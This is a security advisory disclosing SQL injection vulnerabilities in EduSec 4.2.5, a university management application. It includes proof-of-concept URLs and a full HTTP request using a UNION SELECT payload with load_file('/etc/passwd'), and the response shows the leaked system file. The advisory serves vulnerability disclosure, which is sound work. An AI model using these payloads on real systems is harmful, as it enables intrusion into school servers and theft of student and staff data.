EduSec 4.2.5 SQL Injection

`  
EduSec 4.2.5 Multiple SQL Injection Vulnerabilities  
  
  
Vendor: Rudra Softech  
Product web page: http://www.rudrasoftech.com  
Affected version: 4.2.5  
  
Summary: EduSec has a suite of selective modules specifically  
tailored to the requirements of education industry. EduSec is  
engineered and designed considering wide range of management  
functions within the university. With the use of EduSec, staff  
can be more accountable as it helps to know the performance of  
each department in just few seconds. Almost all departments within  
education industry (e. g. admission, administration, time table,  
examination, HR, finance etc) can be synchronized and accessed.  
EduSec helps to assign the responsibilities to employee staff  
and can reduce time wastage and can speed up the administrative  
functions. Core functions like admissions, library management,  
transport management, students’ attendance in short entire range  
of university functions can be well performed by EduSec.  
  
Desc: EduSec suffers from multiple SQL Injection vulnerabilities.  
Input passed via multiple 'id' GET parameters are not properly  
sanitised before being returned to the user or used in SQL queries.  
This can be exploited to manipulate SQL queries by injecting   
arbitrary SQL code.  
  
Tested on: MySQL/5.5.35-0ubuntu0.12.04.2  
Apache/2.4.12 (Ubuntu)  
  
  
Vulnerability discovered by Bikramaditya Guha aka "PhoenixX"  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5326  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5326.php  
  
  
10.05.2016  
  
--  
  
  
Parameter: id (GET)  
POC URL:   
http://localhost/student/stu-master/view?id=2%20UniOn%20SeleCt%201,load_file%28%27/etc/passwd%27%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--#guardians  
http://localhost/employee/emp-master/view?id=20%27  
  
  
Request:  
GET /student/stu-master/view?id=2%20UniOn%20SeleCt%201,load_file(%27/etc/passwd%27),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: PHPSESSID=r18cpflgekesdn8cam8c8jmf86; _csrf=0f8795c6671d0db724d513142cc81e5d3ca8b83c094b970242fda96899be8148a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22E-TdUjNTZVVugL36t2p-VcoC6MBR4hqq%22%3B%7D; language=32d49278f28c78229de164fe79dc13b6adb3c98af2d133240eb1ffc44771ad3da%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22language%22%3Bi%3A1%3Bs%3A2%3A%22en%22%3B%7D; isRTL=0fc3d58c320669b52dea022e5a3db09649641bfdd1cbba93929ce2932c57707aa%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22isRTL%22%3Bi%3A1%3Bi%3A0%3B%7D  
Connection: close  
  
Response:  
HTTP/1.1 200 OK  
Date: Fri, 13 May 2016 08:35:05 GMT  
Server: Apache/2.4.12 (Ubuntu)  
<....snip>  
  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
.  
..  
...  
....  
.....  
......  
`